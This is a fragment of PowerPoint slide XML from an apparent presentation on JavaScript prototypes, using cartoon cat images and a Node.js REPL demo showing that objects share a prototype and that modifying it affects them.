                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32F6C6D8-C66B-2A6A-9646-71D20AC2F057}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="693365" y="1933803"/>
              <a:ext cx="1744412" cy="890822"/>
              <a:chOff x="693365" y="1933803"/>
              <a:chExt cx="1744412" cy="890822"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2E8E66-E96D-0A5F-7888-834BD5336B9C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="693365" y="2516848"/>
                <a:ext cx="1744412"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{hand: "knife"}</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Picture 40" descr="A yellow cat with a knife&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC614B07-4A49-598D-FE54-933C89D8DFD0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1274047" y="1933803"/>
                <a:ext cx="583045" cy="583045"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="Group 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BC40AE-20E0-00F9-565D-0191D0891D0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="597330" y="2794949"/>
              <a:ext cx="1979305" cy="1121666"/>
              <a:chOff x="597330" y="2794949"/>
              <a:chExt cx="1979305" cy="1121666"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="TextBox 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE019060-9BD3-9660-58EB-C45392BF2ACF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="597330" y="3608838"/>
                <a:ext cx="1979305"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firebird</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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="47" name="Picture 46" descr="A cartoon cat holding a flower&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770B0852-9FCD-C13A-E79B-5B57F1689059}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1100429" y="2794949"/>
                <a:ext cx="823156" cy="823156"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="Group 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17EDD60-8BA7-1D58-A2F5-41F85CC3A403}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1195909" y="3808186"/>
              <a:ext cx="1241868" cy="1046530"/>
              <a:chOff x="1195909" y="3808186"/>
              <a:chExt cx="1241868" cy="1046530"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAFEB31-5395-831A-9DE5-D494D06F73DC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1195909" y="454693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pic>
            <p:nvPicPr>
              <p:cNvPr id="56" name="Picture 55" descr="A cartoon cat with a heart&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB445E2-FB2F-8153-2504-85E5F664D0FA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1443061" y="3808186"/>
                <a:ext cx="747563" cy="747563"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="Group 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7090343C-8652-1E9A-C184-E46CEAF2217F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3351548" y="3499390"/>
              <a:ext cx="1744412" cy="1064165"/>
              <a:chOff x="3351548" y="3499390"/>
              <a:chExt cx="1744412" cy="1064165"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="TextBox 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7217477-804F-A484-7A70-3F43A596DEB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3351548" y="4255778"/>
                <a:ext cx="1744412"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59" name="Picture 58" descr="A cartoon cat with a magnifying glass&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9131F03F-DC17-4C4B-7004-3C6F1A362EDD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3774858" y="3499390"/>
                <a:ext cx="834449" cy="834449"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48734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Prototypes are shared demonstration</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D892F7-9420-3BF0-8879-66ED1F15B3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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hand: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"knife"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> })</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true</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firebird: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 })</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true</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 ===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a:t>
            </a:r>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true</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a:t>
            </a:r>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 === </a:t>
            </a:r>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br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</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.getPrototypeOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) === </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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2075798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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>prototype</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE8902AD-0885-9D96-3ECD-8E4B31DFA50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3608479" y="1836812"/>
            <a:ext cx="1927041" cy="1469875"/>
            <a:chOff x="1768719" y="2913342"/>
            <a:chExt cx="1927041" cy="1469875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A8375C-C9C5-2B0A-FCB2-17DFCB0BE270}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1768719" y="4075440"/>
              <a:ext cx="1927041"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9" name="Picture 8" descr="A yellow cat with black lines&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F332FF-2653-2D30-38AD-62B42825B5C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2102487" y="2913342"/>
              <a:ext cx="1219200" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E97284A8-DE94-A6F3-EA13-B48F2CDD7778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5466129" y="1173837"/>
            <a:ext cx="3562758" cy="3729901"/>
            <a:chOff x="5466129" y="1173837"/>
            <a:chExt cx="3562758" cy="3729901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11" descr="A yellow cat with a wrench&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DD2BC18-D35E-2F5C-7686-F35107A3A921}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5466129" y="1173837"/>
              <a:ext cx="3493367" cy="3493367"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F4A9BA-DBFC-9879-15B9-56D379A3807D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5535520" y="4595961"/>
              <a:ext cx="3493367"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.prototype.hand</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"knife"</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D892F7-9420-3BF0-8879-66ED1F15B3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="1321199"/>
            <a:ext cx="7688700" cy="3428651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>What if we modify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a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3428926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 prototype 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Group 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A3F3900-263B-DABE-82C7-E6232C15F050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="597330" y="1575749"/>
            <a:ext cx="8059243" cy="3278967"/>
            <a:chOff x="597330" y="1575749"/>
            <a:chExt cx="8059243" cy="3278967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Connector: Curved 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB31D0BF-5023-8E4D-95DC-4318ACD43594}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3743878" y="2141960"/>
              <a:ext cx="1734965" cy="8574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6A97910-B0D3-8324-4F62-44703852189A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2437777" y="2670737"/>
              <a:ext cx="3041066" cy="3287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F57D46-5D3F-6333-F2B4-779A1BA5338C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2576635" y="2999457"/>
              <a:ext cx="2902208" cy="7632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8A24C60-C14B-9C18-B35F-DAEFF73129C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="10" idx="3"/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2437777" y="4409667"/>
              <a:ext cx="913771" cy="2911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73DB6A8-B84C-A941-7816-66B67F202273}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5095960" y="2999457"/>
              <a:ext cx="382883" cy="14102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D595C3D-2DDE-0115-491D-8E4A38C694D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="3"/>
              <a:endCxn id="12" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7405884" y="2854617"/>
              <a:ext cx="602045" cy="1448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C985A8D-88BD-6C35-5573-3AEF3A5B0F6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5478843" y="1575749"/>
              <a:ext cx="1927041" cy="1685318"/>
              <a:chOff x="5478843" y="1575749"/>
              <a:chExt cx="1927041" cy="1685318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="TextBox 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3733AF-D4CD-7237-2709-B340E20BFDF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5478843" y="2737847"/>
                <a:ext cx="1927041"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{hand: "knife"}</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="Picture 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B33239DE-DC6E-50BD-BD6D-869A2C0F872D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5812611" y="1575749"/>
                <a:ext cx="1219200" cy="1219200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF525AE5-8EDE-870B-E3D6-BFF44C203F0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7914720" y="1995994"/>
              <a:ext cx="741853" cy="1012511"/>
              <a:chOff x="7914720" y="1995994"/>
              <a:chExt cx="741853" cy="1012511"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="TextBox 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FE83C1-5E40-1369-2E84-2048BCC19B96}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8007929" y="2700728"/>
                <a:ext cx="64864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pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Picture 34" descr="A yellow cat with black eyes and mouth and nose&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B906F5DB-0647-97E8-55FF-193A716462C5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7914720" y="1995994"/>
                <a:ext cx="741853" cy="741853"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
